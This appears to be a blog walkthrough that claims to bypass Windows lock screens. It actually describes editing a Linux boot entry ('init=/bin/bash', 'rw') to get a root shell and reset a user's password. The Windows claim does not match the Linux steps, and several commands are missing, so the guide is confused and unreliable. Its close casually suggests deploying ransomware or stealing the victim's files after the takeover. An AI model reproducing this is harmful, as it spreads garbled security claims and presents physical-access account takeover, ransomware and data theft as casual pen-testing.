For a while now, Windows has deferred and disappointed hackers with somewhat secure lock screens for their computers. However, this exploit can bypass these login screens and gain access to internal files. I’ll be doing a full walkthrough on exactly how I did it and hopefully you can get some use out of it.
Disclaimer: Do not do anything mentioned or explained in this article to another person or entity without their permission, and I am not responsible for any actions taken using information from this post.
With that taken care of, let’s get started!
This is a neat bypass method, but you’ll need a few things before you get started →
- A Kali Linux bootable USB (I’ll be making a short ‘how-to’ article after this is posted for those who aren’t familiar with Linux)
- Legal access to the computer you’re testing on
- (Optional) A bit of command line knowledge helps, but it’s not necessary.
Physically, you just need a Kali Linux USB. Then, we can head over to the ‘victim’ computer and begin.
1. Boot up the computer on Kali Linux (do NOT complete the boot)
Hopefully you read ahead a bit and didn’t actually load into the Kali Linux OS, because we do need to edit a few things once we get to this screen:
Once you’re on this screen and you’re on ‘Kali GNU/Linux’, press ‘e’. This will bring you to the edit screen for the boot option, and you’ll need to edit a couple of things for our purposes.
2. Edit boot code
Once you’ve hit ‘e’ and made it to this screen, you’ll see something a bit like this, probably with a different resolution. My text looks compacted because I’m on a virtual machine, but it makes little difference for our purposes. Somewhere on your screen, you’ll see ‘ro’ and then either ‘single’ or ‘quiet splash’.
You’ll need to change ‘ro’ to ‘rw’, as we have above. Then, after either ‘single’ or ‘quiet splash’, add ‘init=/bin/bash’. Press Control-X to reboot, and if everything works successfully and you’re presented with a shell move to step 3. Otherwise, repeat the process and change ‘/bin/bash’ to either ‘/bin/zsh’ or ‘/bin/csh’.
3. Root shell! Retrieve and modify some info with our root permissions.
Great. Now we’ve got some things we can do on this machine. We’ll run ‘mount’ to check our work, and if we’re still in the shell everything is good to go.
Run this command to view the usernames registered on the machine:
This will presumably dump a considerable amount of information, so you might need to sift through it to find the exact username you’re looking for. It should look a bit like this:
root:x:0:0:root:/root:/usr/bin/zsh ... graham1234:x:1000:1000:graham1234,,,:/home/graham1234 ...
A basic command after that…
and it will allow you to enter a new password, no checks or authentication required! It works like this for administrative and pretty much worst-case-scenario purposes, but we can use it to our advantage as pen-testers.
4. Lastly, reboot the system
Use this command to reboot, and you should see the default Kali Linux login page:
You should be brought to this page:
Sign in with your credentials that you modified before, using the equivalent of ‘graham1234’ and the password you just set. You should be able to access the filesystem of the user, and now that you’ve changed their password you can use things like ransomware or steal their files (legally, of course). Pretty neat!
I hope this post was informative or helpful to you in some way. If you enjoyed learning about this method, hold down the clap button for a few seconds to support me. If you’d like to see similar articles, check out The Gray Area or grahamzemel.com.
To really contribute to my work and help me out as a writer, sign up for a Medium membership using my referral link.